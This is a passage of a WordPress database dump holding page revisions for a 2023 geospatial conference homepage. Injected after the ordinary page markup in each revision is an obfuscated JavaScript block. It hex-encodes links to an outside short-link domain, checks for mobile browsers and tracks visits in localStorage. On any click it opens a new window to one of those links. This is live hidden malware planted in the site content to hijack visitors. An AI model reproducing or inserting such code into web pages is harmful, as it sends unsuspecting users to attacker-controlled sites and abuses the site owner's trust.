)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:23:59','2022-11-09 15:23:59','',3066,'https://gsw2023.com/?p=3138',0,'revision','',0),
(3139,1,'2022-11-09 15:27:17','2022-11-09 15:27:17','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" awb_type=\"image\" awb_image_background_position=\"0% 50%\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\" awb_image=\"2275\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:27:17','2022-11-09 15:27:17','',3066,'https://gsw2023.com/?p=3139',0,'revision','',0),
(3140,1,'2022-11-09 15:28:33','2022-11-09 15:28:33','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\" awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner 